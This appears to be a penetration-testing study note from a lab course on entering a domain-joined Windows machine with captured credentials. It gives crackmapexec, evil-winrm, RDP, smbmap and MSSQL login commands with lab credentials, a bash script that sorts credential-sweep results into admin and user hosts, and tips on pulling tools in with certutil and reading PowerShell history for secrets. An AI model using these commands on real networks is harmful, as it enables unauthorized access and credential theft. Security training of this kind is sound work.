3. Entering a Domain-Joined Machine
Goal: Gain a shell or interactive session on a domain-joined system using captured or guessed credentials.
Objectives
- Use valid credentials to authenticate to a domain-joined machine
- Establish a stable foothold (CLI, shell, remote desktop, etc.)
- Identify the level of access and context of the current session
```mermaid
graph TD
A[Have Valid Credentials] --> B[Find Domain-Joined Targets]
B --> C[Attempt Authentication]
C --> D1[SMB / WinRM / RDP Login]
C --> D2[SQL Auth / Web Panel]
D1 --> E[Command Execution or Shell]
D2 --> E
E --> F[Start Enumeration of Machine & User Context]
```
| Technique / Protocol | Tool / Command | Notes |
|---|---|---|
| SMB authentication | `crackmapexec smb <IP> -u <user> -p <pass>` | Check whether the credentials are accepted, enumerate shares or users; `(Pwn3d!)` in the output means local admin on that host |
| Remote shell (WinRM) | `evil-winrm -i <IP> -u <user> -p <pass>` | Interactive shell with PowerShell support (the user must be in Remote Management Users or be a local admin) |
| RDP | `xfreerdp /v:<IP> /u:<user> /p:<pass>` | GUI session to interact with the system |
| MSSQL | `impacket-mssqlclient` or `PowerUpSQL` | Authenticate to SQL instances; command execution is possible if `xp_cmdshell` is enabled or can be enabled |
| Local enumeration via shell | `whoami`, `hostname`, `ipconfig`, `net user`, etc. | Initial recon on the target box |
| Shared folder access | `smbclient` or `smbmap` | Browse file shares with the authenticated session |
| Domain enumeration (PowerView) | `Get-Domain*`, `Get-Net*` PowerShell cmdlets | Confirm the machine is domain-joined and start mapping the domain |
Example: WinRM shell via evil-winrm

```bash
evil-winrm -i 172.16.5.50 -u damundsen -p 'SQL1234!'
```

Example: SMB share access with smbmap

```bash
smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5
```
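A credential sweep with crackmapexec against a list of hosts prints one result line per host, and the triage question is which hosts accept the credentials at all and which are marked `(Pwn3d!)` (local admin, i.e. the evil-winrm / psexec candidates) versus which only allow user-level access (share browsing, local enumeration). The bash helper below is an added example, not part of the original notes: it parses that output into per-host access levels. The hosts, hostnames and credentials in the embedded sample are constructed, and the line format assumed is the `PROTO IP PORT HOSTNAME [+|-] DOMAIN\user:pass` layout crackmapexec prints.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): triage a crackmapexec SMB
# credential sweep into admin / user / denied hosts. All hosts and
# credentials below are constructed sample data.
set -eu

# Constructed sample output in crackmapexec's result-line format:
#   PROTO  IP  PORT  HOSTNAME  [+|-]  DOMAIN\user:pass  [(Pwn3d!)|STATUS_...]
SAMPLE_CME_OUTPUT='SMB         172.16.5.5      445    ACADEMY-EA-DC01  [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [+] INLANEFREIGHT.LOCAL\forend:Klmcargo2
SMB         172.16.5.50     445    ACADEMY-EA-MS01  [+] INLANEFREIGHT.LOCAL\forend:Klmcargo2 (Pwn3d!)
SMB         172.16.5.130    445    ACADEMY-EA-FILE  [-] INLANEFREIGHT.LOCAL\forend:Klmcargo2 STATUS_LOGON_FAILURE'

# Read CME output on stdin, print "IP<TAB>HOSTNAME<TAB>LEVEL" per login result.
# LEVEL: "admin" when the line carries "(Pwn3d!)", "user" for a plain [+],
# "denied" for [-]. Banner lines ([*]) are ignored.
cme_triage() {
  awk '
    $5 == "[+]" && $0 ~ /\(Pwn3d!\)/ { print $2 "\t" $4 "\tadmin";  next }
    $5 == "[+]"                      { print $2 "\t" $4 "\tuser";   next }
    $5 == "[-]"                      { print $2 "\t" $4 "\tdenied" }
  '
}

# Hosts where the credentials give local admin (WinRM / psexec candidates).
admin_hosts() { cme_triage | awk -F"\t" '$3 == "admin" { print $1 }'; }

# Hosts where the login works without admin (share browsing, user-level enum).
user_hosts()  { cme_triage | awk -F"\t" '$3 == "user"  { print $1 }'; }

# Real use: crackmapexec smb targets.txt -u forend -p Klmcargo2 | tee cme.log | cme_triage
printf '%s\n' "$SAMPLE_CME_OUTPUT" | cme_triage
```

Feed a real sweep through `cme_triage` (or save it with `tee` first) and pass the `admin_hosts` list straight to evil-winrm; `user_hosts` are the ones worth hitting with smbmap and local enumeration only.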
Pro Tips
- Use `crackmapexec ... --local-auth` if you suspect the credentials belong to a local (non-domain) account; without it, crackmapexec authenticates against the domain and a valid local account will show as a failed logon
- Drop tools via `certutil -urlcache -split -f <URL> <file>`, `Invoke-WebRequest`, or a share served from your box with `impacket-smbserver`
- Verify domain membership with `systeminfo | findstr /B /C:"Domain"` (shows the machine's domain; `WORKGROUP` means it is not joined) or `echo %USERDOMAIN%` (shows the domain of the account you are logged in as; it equals `%COMPUTERNAME%` for a local account)
- After connecting, check for session tokens, credential files, and PowerShell logs (PSReadLine history under `%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt`, transcripts, and the PowerShell event logs)